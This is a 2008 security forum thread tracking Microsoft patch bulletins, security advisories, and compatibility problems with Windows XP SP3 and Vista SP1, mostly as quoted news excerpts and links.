
Overview of the April 2008 Microsoft patches and their status...

MS08-020 - DNS client - Update: well published problem

MS08-021 - GDI - Update: April 11th: Arbor networks reporting exploits in the wild

MS08-022 - Scripting engines - Update: PoC available in for pay program

MS08-023 - ActiveX - PoC exploits were posted on the internet

MS08-025 - Windows kernel - Proof of concept available in a for pay program

:fear::spider::fear:

AplusWebMaster
2008-04-17, 19:58
FYI...

- http://www.theregister.co.uk/2008/04/16/vista_defender_sp1/
16 April 2008 - "Microsoft has admitted it is investigating reports that a recent Windows Vista security update causes havoc with some USB devices, but the software giant is yet to provide a fix for the cock-up. The Windows Defender update was released last week, but some unfortunate Vista customers have claimed that their USB mice and keyboards among other devices refuse to work after the update is installed on their computers... the automatic version of the (SP1) download remains missing in action. Redmond had chalked mid-April as the date when SP1 would start downloading onto computers across the world..."

:sad:

AplusWebMaster
2008-04-18, 15:04
FYI...

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
April 17, 2008 - "Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability. Currently, Microsoft is not aware of any attacks attempting to exploit the potential vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers..."

AplusWebMaster
2008-04-19, 13:52
FYI...

...Vista SP1 is not available for installation from WU and is not offered by Automatic Updates
- http://support.microsoft.com/?kbid=948343
Last Review: April 18, 2008 <<<
Revision: 6.0...


:lip:

AplusWebMaster
2008-04-22, 02:56
FYI...

(Another tale of "Windows Genuine Annoyance" - an Office nag)
- http://preview.tinyurl.com/4wona3
April 19, 2008 (Computerworld) - "... By early Wednesday, administrators in the U.S., the U.K., New Zealand and elsewhere were posting messages on Microsoft support newsgroups, asking why their WSUS systems had received the Office nag. In some cases, administrators reported that the update had fingered large numbers of desktop PCs as running counterfeit copies of Office. "Update KB949810 arrived via WSUS yesterday, and now all my XP workstations running Word 2002 are telling me it needs activating," said a user... in the U.K. "The only problem is that the software is genuine and was activated three years ago"... "There is nothing more frustrating as a Microsoft shareholder to constantly see Microsoft shoot themselves in the foot by treating legal customers in this manner.*"..."
* http://forums.microsoft.com/Genuine/ShowPost.aspx?PostID=3188048&SiteID=25

:lip:

AplusWebMaster
2008-04-22, 04:28
FYI...

- http://preview.tinyurl.com/3nkl3q
April 21, 2008 (Computerworld) - "Microsoft Corp. today finally slapped a "Done" sticker on Windows XP Service Pack 3 and pushed it out the door. The designation of SP3 as RTM, short for "release to manufacturing"..."
(Many "Q&A's" at the URL above.)

Overview of Windows XP SP3 - link to .pdf file here
- http://preview.tinyurl.com/35uwdq
428 K
Windows XP SP3 forum
- http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&SiteID=17

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207401041
April 21, 2008 - "...the third and final service pack for its Windows XP operating system and that the update will be available for public download on April 29... The service pack should offer a number of enhancements over the current version of the OS. It includes all updates issued since Windows XP Service Pack 2 was released in 2004, and some new elements. Among them: A feature called Network Access Protection that's borrowed from the newer Windows Vista operating system. NAP automatically validates a computer's health, ensuring that it's free of bugs and viruses before allowing it access to a network. Windows XP SP3 also includes improved "black hole" router detection -- a feature that automatically detects routers that are silently discarding packets. In XP SP3, the feature is turned on by default, according to Microsoft..."

AplusWebMaster
2008-04-24, 17:34
FYI...

- http://preview.tinyurl.com/5vu4aw
April 23, 2008 (Infoworld) -"...Vista Service Pack 1 will download automatically to PCs that have the automatic update feature of the OS turned on, the company said. Previously, Vista was available to customers via Windows Update, but people had to specifically download it. Not all customers will receive SP1 immediately via Automatic Update, however. The company is distributing it in phases to "ensure a seamless download experience," Microsoft said. A timeline for when all customers would receive Vista SP1 via Automatic Update was not immediately available..."

- http://support.microsoft.com/?kbid=948343
Last Review: April 23, 2008
Revision: 7.0...

AplusWebMaster
2008-04-29, 21:16
FYI...

- http://isc.sans.org/diary.html?storyid=4358
Last Updated: 2008-04-29 17:03:11 UTC - "...the Windows Service Pack blocker tool can now block the following service packs from installation...
* Windows XP Service Pack 3 (valid for 12 months following general availability)
* Windows Vista Service Pack 1 (valid for 12 months following general availability)
So, if you want to prevent your machines from automatic updates (provided you don't use WSUS), you can download this handy tool from here*..."
* http://preview.tinyurl.com/2uryvq
Windows Service Pack Blocker Tool Kit
Quick Details
File Name: SPBlockerTools.EXE
Version: SPBlockerToolKit
Date Published: 12/6/2007
Language: English
Download Size: 96 KB

:spider:

AplusWebMaster
2008-04-30, 00:58
FYI...

MS delays release of XPSP3
- http://preview.tinyurl.com/56vprz
April 29, 2008 (Infoworld) - "Microsoft has delayed the release of a third service pack for Windows XP, blaming a "compatibility issue" between the software and a retail-chain-management application... incompatibilities discovered in the past several days between an application called Microsoft Dynamics RMS and -both- Windows XP SP3 and Windows Vista Service Pack 1 will force the company to hold off on releasing the software. Dynamics RMS is a retail-chain-management software for SMBs. Microsoft said it is putting filtering in place to prevent its Windows Update service from offering both service packs to systems running Microsoft Dynamics RMS. Once that filtering is in place, Microsoft will release Windows XP SP3 to Windows Update and Download Center for users not running the application causing the problem.
The company on Tuesday did not say how long putting in filters would take. Microsoft is recommending that Microsoft Dynamics RMS customers not install Windows XP SP3 or Windows Vista SP1. For more information, those customers should contact Microsoft Customer Support Services, the company said. A fix to the Dynamics RMS problem is being tested and "will be available as soon as that process is complete," Microsoft said. The company did not provide a time frame for completion of the testing..."

AplusWebMaster
2008-04-30, 23:20
FYI...

- http://www.milw0rm.com/exploits/5518
2008-04-28 - "[Windows XP SP2 (win32k.sys)] This exploit takes advantage of one of the vulnerabilities patched in the Microsoft Security bulletin MS08-25
http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx ..."
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)

:fear:

AplusWebMaster
2008-05-04, 03:29
FYI...

Vista Audio Driver...
- http://isc.sans.org/diary.html?storyid=4376
Last Updated: 2008-05-03 23:26:07 UTC - "...a recent update offered for a driver update for IDT (Formerly Sigmatel)'s high definition sound is causing problems for -Dell- users that have installed it. "Should you see this update appear, *do not* install it," warned 'Chris B', a Dell Digital Life Liason, in a Thursday forum post. The update is called IDT High Def Codec and was reported to be one of the drivers that held up the release of SP1 for Vista back in February. If you have a Dell computer and have not yet installed Vista SP1, you may want to take a look at the full article.
- http://www.crn.com/software/207500472 "

:sad:

AplusWebMaster
2008-05-05, 20:51
Good grief...

Vista Service Pack 1 is not available...
- http://support.microsoft.com/?kbid=948343
Article ID: 948343
Last Review: May 5, 2008
Revision: 9.0...

:sad:

AplusWebMaster
2008-05-06, 14:58
FYI...

Windows Vista SP1 Disaster Recovery Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207402843
May 6, 2008


.

AplusWebMaster
2008-05-06, 23:48
FYI...

- http://isc.sans.org/diary.html?storyid=4387
Last Updated: 2008-05-06 20:10:06 UTC - "Microsoft, it appears, has just released Windows XP Service Pack 3*. For the most part, it is a bundle of all the updates since Service Pack 2, but there are some key differences.
First, the big gotcha:
- If you are an IE 6 user, SP3 will simply updated your IE 6 installation. You will continue to be able to upgrade to IE 7 as an option.
- If you are an IE 7 user, it will update your IE 7 installation. HOWEVER, you will NOT be able to go back to IE 6 after applying this service back.
- If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.
This link** has a list of all the Knowledge Base articles that this service pack addresses. Some of the bigger notes is that it does retrofit some of the Vista functionality into XP, namely in the area of Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel mode crypto driver. Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MXSXML6, WPA2 support, etc). The good news is that TechNet provides installation media that can be used to slipstream install the service pack so workstations can be updated off the net."

Windows XP SP3 Network Installation Package for IT Professionals and Developers
* http://preview.tinyurl.com/6k9zo3
316.4 MB
"...Note: Customers running Microsoft Dynamics Retail Management System (RMS) are advised to install a hotfix for a Microsoft Dynamics RMS issue -prior- to installing Windows XP SP3. http://support.microsoft.com/kb/951937
DO NOT CLICK DOWNLOAD IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is now available on Windows Update..."

Release notes for Windows XP Service Pack 3
** http://support.microsoft.com/kb/936929
Last Review: May 6, 2008
Revision: 5.0...

:fear:

AplusWebMaster
2008-05-08, 20:52
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-may.mspx
May 8, 2008
"This is an advance notification of security bulletins that Microsoft is intending to release on May 13, 2008...

Critical (3)

Word Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Publisher Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Jet Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


Moderate (1)

Security Software Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Denial of Service...
Affected Software: Windows Live OneCare, Microsoft Antigen, Microsoft Windows Defender, Microsoft Forefront Security...

AplusWebMaster
2008-05-09, 13:52
FYI...

XP SP3 crashes AMD machines
- http://www.theinquirer.net/gb/inquirer/news/2008/05/09/xp-sp3-crashes-amd-machines
9 May 2008 - "...Windows XP, Service Pack 3, is giving owners of machines with AMD hardware headaches aplenty it seems. The problems, which first arose just one day after the push, have been causing lots of noise on Microsoft support sites and angry user bogs. One user reported, "I just installed Windows XP SP3 and after completing the processes and when the system reboots, the system cannot proceed to load the Windows. It just displays the flash screen of Windows then after it reboots again." Angry users have also reported that, after the installation, it is not even possible to boot in safe mode, usually the last resort before setting up a repeated forehead/screen interface... there appears to be two separate problems. One affects only AMD-equipped PCs sold by Hewlett-Packard. "The problem is that HP, apparently along with other OEMs, deploys the same image to Intel-based computers that they do to AMD-based computers," said Johansson. "Because the image for both Intel and AMD is the same all have the intelppm.sys driver installed and running. That driver provides power management on Intel-based computers. On an AMD-based computer, amdk8.sys provides the same functionality." There's a whole bunch of other info and some useful fixes for those of you stuck in the dreaded loop of death over on Jesper's Bog*."
* http://preview.tinyurl.com/6zs52d
(MSinfluentials.com/blogs/jesper)

:sad::trample::thud:

AplusWebMaster
2008-05-13, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx
May 13, 2008
"This bulletin summary lists security bulletins released for May 2008...

Critical (3)

Microsoft Security Bulletin MS08-026
Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (951207)
- http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-027
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (951208)
- http://www.microsoft.com/technet/security/bulletin/ms08-027.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-028
Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution (950749)
- http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-029
Vulnerabilities in Microsoft Malware Protection Engine Could Allow Denial of Service (952044)
- http://www.microsoft.com/technet/security/bulletin/ms08-029.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Denial of Service...
Affected Software: Windows Live OneCare, Microsoft Antigen, Microsoft Windows Defender, Microsoft Forefront Security...


New, Revised, and Rereleased Updates for Microsoft Products Other Than Microsoft Windows
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx


ISC Analysis
- http://isc.sans.org/diary.html?storyid=4411
Last Updated: 2008-05-13 17:59:16 UTC

AplusWebMaster
2008-05-17, 04:51
FYI...

Microsoft Security Advisory (950627)
Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/950627.mspx
Updated: May 13, 2008 - "...We have issued Microsoft Security Bulletin MS08-028 to address this issue. For more information about this issue, including download links for an available security update, please review MS08-028*... In addition to immediately installing the update in Microsoft Security Bulletin MS08-028, we recommend that customers with Microsoft Word also immediately install the update in Microsoft Security Bulletin MS08-026**: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (951207), for the most up-to-date protection against the attack vector for these types of attacks..."

* http://go.microsoft.com/fwlink/?LinkId=114750

** http://go.microsoft.com/fwlink/?LinkId=117295

:fear:

AplusWebMaster
2008-05-20, 15:10
HP - AMD - XPSP3...

XP SP3 Upgrade Utility for systems with AMD processors
- http://preview.tinyurl.com/4g2b6y
Release Date: 2008-05-14 - Version: 1.0 (HP Customer Care)
Description: Microsoft Windows XP SP3 Upgrade Utility prevents continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Windows XP SP3 on systems with AMD processors.
Fixes: Prevents a condition from occurring that causes continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Microsoft Windows XP Service Pack 3 on systems with an AMD processor.
Example: "A problem has been detected and Windows has been shut down to prevent damage to your computer..."

Download: sp37394.exe (1.85M)

.

AplusWebMaster
2008-05-21, 16:35
FYI...

XPSP3 chokes on ISP versions of IE7
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207801330
May 20, 2008 - "Private label versions of Microsoft's Internet Explorer 7 browser, including those provided to customers by Internet Service Providers Comcast and Qwest, are prone to crash during installation on computers running Windows XP SP3 because they tend to be outdated, Microsoft is warning. The problem generally occurs when a so-called "branded" version of IE7 is installed for the first time on a computer that's running XP SP3, said Microsoft program manager Jane Maliouta, in a blog post*. "The reason is that the IE7 package you are trying to install uses old IE7 files," said Maliouta. The trouble? Some ISPs are still distributing versions of IE7 that don't contain updates designed to make the browser compatible with Windows XP SP3. Specifically, XP3 runs a version of an essential dynamic-link library file called XMLLite.dll that's not compatible with versions of IE7 released prior to October..."
* http://preview.tinyurl.com/6rwwf8
May 12, 2008 (blogs.msdn.com)

:fear:

AplusWebMaster
2008-05-22, 14:55
FYI...

XP SP3 triggers false positives in security apps
- http://windowssecrets.com/comp/080522#story1
2008-05-22 - "Installing Windows XP Service Pack 3 can cause your anti-malware programs to report the presence of Trojans and keyloggers that aren't there. The false positives have blocked important system files in some cases, and in others they have misled users into reinstalling XP... Comments on a PC Tools forum* confirm customer reports that the company's Spyware Doctor program generates a false positive on systems with Windows XP SP3. Similarly, at least one site claims that Symantec's Norton Internet Security software identifies a common system file as a keylogger. ReviewSaurus reports** that XP SP3 causes Norton Internet Security to identify ctfmon.exe as a keylogger (a kind of malware that records your keystrokes to capture passwords and other important data). In reality, the ctfmon.exe file in your Windows\System32 folder is a Microsoft system file that enables alternative input methods such as speech, tablet, or on-screen keyboard. A spokesperson for Symantec was not immediately available for comment..."

* http://www.pctools.com/forum/showthread.php?t=51766&page=3

** http://www.reviewsaurus.com/tips-tricks/windows-xp-sp3-service-pack-3-install-problems/

.

AplusWebMaster
2008-05-29, 17:20
FYI...

- http://windowssecrets.com/comp/080529#patch0
2008-05-29 - "Antivirus software from Symantec Corp. may cause the installation of Service Pack 3 for XP to corrupt the Windows Registry by adding unnecessary keys.
Symantec advises users to disable the SymProtect security feature of its products before applying XP SP3.
A Registry fix is needed by the latest XP patch..."

(More detail at the URL above.)

:fear:

AplusWebMaster
2008-05-31, 09:00
FYI...

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 - "Microsoft is investigating new public reports of a blended threat that allows remote code execution on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed. Safari is not installed with Windows XP or Windows Vista by default; it must be installed independently or through the Apple Software Update application. Customers running Safari on Windows should review this advisory.
At the present time, Microsoft is unaware of any attacks attempting to exploit this blended threat. Upon completion of this investigation, Microsoft will take the appropriate measures to protect our customers. This may include providing a solution through a service pack, the monthly update process, or an out-of-cycle security update, depending on customers needs.
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are -not- affected by this blended threat."
- http://blogs.technet.com/msrc/archive/2008/05/30/security-advisory-953818-posted.aspx
May 30, 2008

- http://secunia.com/advisories/30467/
Release Date: 2008-06-02
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows Vista, Microsoft Windows XP Home Edition, Microsoft Windows XP Professional
Software: Safari for Windows 3.x
...The vulnerability is reported in Safari running on Windows XP or Vista.
Solution: Set the download location in Safari to a location other than "Desktop"...
Original Advisory: http://www.microsoft.com/technet/security/advisory/953818.mspx

AplusWebMaster
2008-06-02, 23:18
FYI...

XPSP3 replaced the up-to-date flash.ocx...
- http://isc.sans.org/diary.html?storyid=4513
Last Updated: 2008-06-02 19:18:05 UTC - "It appears that XPSP3 installs an older vulnerable version of the flash player...
http://www.microsoft.com/technet/security/Bulletin/MS06-069.mspx
Why was this Bulletin revised on May 13, 2008?
This bulletin was revised to add Windows XP Service Pack 3 as affected software..."
> Latest v9,0,124,0 - http://www.adobe.com/go/getflashplayer

Other references noting the problem:

- http://preview.tinyurl.com/5cz4wt
June 01, 2008 9:38 PM (Donna's SecurityFlash)

Ref: http://www.dozleng.com/updates/index.php?showtopic=18354&st=0&p=80908&#entry80908

:spider::oops::rolleyes:

AplusWebMaster
2008-06-06, 13:20
FYI...

PCpitstop XPSP3 review:
- http://preview.tinyurl.com/4y7zqc
May 25, 2008 - Windows XP SP3 Issues and Fixes Continued


:sad:

AplusWebMaster
2008-06-06, 14:50
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jun.mspx
June 5, 2008 - "...This is an advance notification of security bulletins that Microsoft is intending to release on June 10, 2008..."
(Total of -7-)

Critical (3)

Bulletin Identifier: Bluetooth Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Bulletin Identifier: Internet Explorer Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Bulletin Identifier: DirectX Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (3)

Bulletin Identifier: WINS Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Bulletin Identifier: Active Directory Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Bulletin Identifier: PGM Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Moderate (1)

Bulletin Identifier: Kill Bit Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


This advance notification provides the software subject as the bulletin identifier, because the official Microsoft Security Bulletin numbers are not issued until release...

AplusWebMaster
2008-06-08, 13:13
FYI...

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Revisions:
• May 30, 2008: Advisory published.
• June 6, 2008: Modified the steps in the workaround and added acknowledgment.

:fear:

AplusWebMaster
2008-06-10, 20:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-jun.mspx
June 10, 2008 - "This bulletin summary lists security bulletins released for June 2008...

Critical (3)

Microsoft Security Bulletin MS08-030
Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (951376)
- http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-031
Cumulative Security Update for Internet Explorer (950759)
- http://www.microsoft.com/technet/security/bulletin/ms08-031.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-033
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/bulletin/ms08-033.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (3)

Microsoft Security Bulletin MS08-034
Vulnerability in WINS Could Allow Elevation of Privilege (948745)
- http://www.microsoft.com/technet/security/bulletin/ms08-034.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-035
Vulnerability in Active Directory Could Allow Denial of Service (953235)
- http://www.microsoft.com/technet/security/bulletin/ms08-035.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-036
Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Denial of Service (950762)
- http://www.microsoft.com/technet/security/bulletin/ms08-036.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-032
Cumulative Security Update of ActiveX Kill Bits (950760)
- http://www.microsoft.com/technet/security/bulletin/ms08-032.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


• New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx

-------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4552
Last Updated: 2008-06-10 18:09:18 UTC

MS08-031 - MSIE - Details on attacking CVE-2008-1544 are publicly available

MS08-032 - ActiveX Kill Bits - Publicly discussed

------
Geez...

- http://www.microsoft.com/technet/security/bulletin/ms08-jun.mspx
Revisions
• V1.0 (June 10, 2008): Bulletin summary published.
• V1.1 (June 11, 2008): Corrected the Affected Software table for Windows XP, to clarify the entries for Windows XP Service Pack 2 and Windows XP Service Pack 3 for MS08-030, MS08-031, MS08-032, MS08-033, and MS08-036.

:fear:

patflgn
2008-06-12, 20:51
Windows XP SP3 is crashing BiPAC 5200 series modem/routers. The problem lies with the routers, however, and there is a patch available.

It does not appear that these routers are sold in the US, though.

http://www.billion.com/notice-200805.html

AplusWebMaster
2008-06-16, 15:21
FYI...

Microsoft Security Advisory (954474)
System Center Configuration Manager 2007 Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954474.mspx
June 13, 2008 - "Microsoft is investigating public reports of a non-security issue that affects environments with System Center Configuration Manager 2007 that deploy updates to Systems Management Services (SMS) 2003 clients. Microsoft is aware of reports from customers who are experiencing this issue. Upon completion of the investigation, Microsoft will take the appropriate action to resolve the problem within System Center Configuration Manager 2007.
Mitigating Factors:
• This issue impacts customers using System Center Configuration Manager 2007 servers to deploy updates to SMS 2003 clients..."

:fear:

AplusWebMaster
2008-06-18, 14:01
FYI...

Microsoft Security Advisory (954474)
System Center Configuration Manager 2007 Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954474.mspx
Updated: June 17, 2008 - "... Microsoft has confirmed those reports and has released an update to correct this issue under Microsoft Knowledge Base Article 954474*. Microsoft encourages customers affected by this issue to review and install this update..."
* http://support.microsoft.com/kb/954474
Last Review: June 17, 2008
Revision: 2.1

AplusWebMaster
2008-06-20, 13:22
FYI...

MS08-030 - new patch, for XPSP2 & XPSP3
- http://isc.sans.org/diary.html?storyid=4600
Last Updated: 2008-06-20 01:20:41 UTC - "Microsoft issued a new patch, for XPSP2 & XPSP3, for MS08-030*: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action"... The Technet Security Vulnerability Research & Defense blog** on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".
Related update- KB KB951376 Security Update for Windows XP:
http://support.microsoft.com/kb/951376/en-us ..."
Last Review: June 19, 2008
Revision: 2.0

* http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Revisions:
• V1.0 (June 10, 2008): Bulletin published.
• V2.0 (June 19, 2008): Added "Why was this security update reoffered on June 19, 2008?" entry to the Update FAQ to advise customers running Windows XP Service Pack 2 and Windows XP Service Pack 3 that a revised version of the security update is available.
"...Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update..."

** http://preview.tinyurl.com/67t4uw
(blogs.technet.com)

:fear:

AplusWebMaster
2008-06-23, 20:55
FYI...

- http://preview.tinyurl.com/4nhmfr
June 20, 2008 (blogs.technet.com) - "...After its first -day- in MSRT, Taterf components had been removed from over 700,000 machines! For comparison, Win32/Nuwar (aka ‘Storm worm’) was removed from less than half that in its first month... So how does one avoid being infected? Running an up-to-date anti-virus solution is a good start. Running an up-to-date, patched browser is another necessity – many of the Win32/Frethog trojans are installed via browser exploits (there have been instances in the past of links to malicious sites being posted to popular gaming forums – so be wary!). Enabling Automatic Updates helps a whole bunch too. Disabling the Explorer ‘autoplay’ feature is useful in helping to avoid these problems..."

(Charts of disinfections/country available at the URL above.)

:D:

AplusWebMaster
2008-06-25, 14:59
FYI...

Microsoft Security Advisory (954462)
Rise in SQL Injection Attacks Exploiting Unverified User Data Input
- http://www.microsoft.com/technet/security/advisory/954462.mspx
June 24, 2008 - "Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.
Mitigating Factors:
This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input...
(See) Suggested Actions..."
• Detection – HP Scrawlr - http://preview.tinyurl.com/4qkk6g ...
• Defense – UrlScan - http://learn.iis.net/page.aspx/473/using-urlscan
• Identifying - Source Code Analyzer for SQL Injection - http://support.microsoft.com/kb/954476
• Additional Info...

Microsoft SQL Injection Prevention Strategy
- http://isc.sans.org/diary.html?storyid=4621
Last Updated: 2008-06-24 22:17:41 UTC - "...Microsoft recommends three approaches to help mitigate SQL Injection.
• Runtime scanning...
• URLScan...
• Code Scanning..."

- http://atlas.arbor.net/briefs/index#361782669
June 25, 2008 - "Microsoft today released security tools to help customers deal with SQL Injection Attacks. UrlScan, Microsoft Source Code Analyzer for SQL Injection and Scrawlr can be used by customers to check for SQL Injection issues in their applications.
Analysis: The release of these tools comes in a time when SQL injection is increasingly exploited. UrlScan is used to restrict HTTP requests that IIS will process."
* http://preview.tinyurl.com/5t2sbh
(blogs.technet.com)

:fear:

AplusWebMaster
2008-06-26, 13:24
FYI...

A reliability and performance update is available for Windows Vista SP1-based computers
- http://support.microsoft.com/kb/952709
Last Review: June 24, 2008
Revision: 1.0
"...This update includes the following improvements on a Windows Vista SP1-based computer:
• This update improves the stability of Windows Vista SP1-based computers by addressing some crashes that may occur when you try to check e-mail by using a POP3 e-mail client such as Windows Mail or Mozilla Thunderbird. The crashes may occur on a Windows Vista SP1-based computer in the following scenario:
• Incoming POP3 and outgoing SMTP traffic monitoring is enabled.
• Both a third-party antivirus application and an antispyware application are installed, such as the following applications:
• ZoneAlarm Internet Security Suite by Check Point Software Technologies Ltd.
• SpySweeper by Webroot Software, Inc.
• This update improves the reliability of the Windows Vista SP1 based-computers by addressing some problems that occur when you delete user accounts by using the User Accounts item in Control Panel. When this problem occurs, the system may stop responding (hang).
• This update improves the reliability of Windows Vista SP1-based computers that experience issues in which large applications cannot run after the computer is turned on for extended periods of time. For example, when you try to start Excel 2007 after the computer is turned on for extended periods of time, a user may receive an error message that resembles the following:
EXCEL.EXE is not a valid Win32 application
• This update improves the reliability of Windows Vista SP1-based computers by reducing the number of crashes that may be caused by the Apple QuickTime thumbnail preview in Windows Live Photo Gallery.
• This update improves the performance of Windows Vista SP1-based computers by reducing audio and video (AV) stuttering. Such AV stuttering may occur when the audio or video component is streaming high definition content from a Windows Vista SP1-based computer that has a NVIDIA network adapter nForce driver version 67.5.4.0 that is installed to a Windows Media Center Extender device..."

:fear::spider:

AplusWebMaster
2008-06-29, 14:24
FYI...

Device Manager may not show any devices and Network Connections may not show any network connections after you install Windows XP Service Pack 3 (SP3)
- http://support.microsoft.com/?kbid=953979
Last Review: June 25, 2008
Revision: -4.2-
SYMPTOMS:
After you install Windows XP Service Pack 3 (SP3), Device Manager may not show any devices and Network Connections may not show any network connections.
This problem may occur when an antivirus application is running during the installation of Windows XP SP3.
CAUSE
This problem occurs when the Fixccs.exe process is called during the Windows XP SP3 installation. This process creates some intermediate registry subkeys, and it later deletes these subkeys. In some cases, some antivirus applications may not let the Fixccs.exe process delete these intermediate registry subkeys.
When this problem occurs, certain applications, such as Device Manager and Network Connections, may be unable to enumerate the device or the connection instances. These applications will report a blank status even though devices and connections still function as expected.
RESOLUTION
Hotfix information:
The following file is available for download from the Microsoft Download Center:
Download the Update for Windows XP (KB953979) package now:
- http://preview.tinyurl.com/3jgjap
File Name: WindowsXP-KB953979-x86-ENU.exe
Download Size: 64 KB...
Prerequisites:
To use this hotfix, you must have Windows XP Service Pack 3 installed on the computer...
Restart requirement:
To apply this hotfix, you must restart the computer in Safe Mode..."

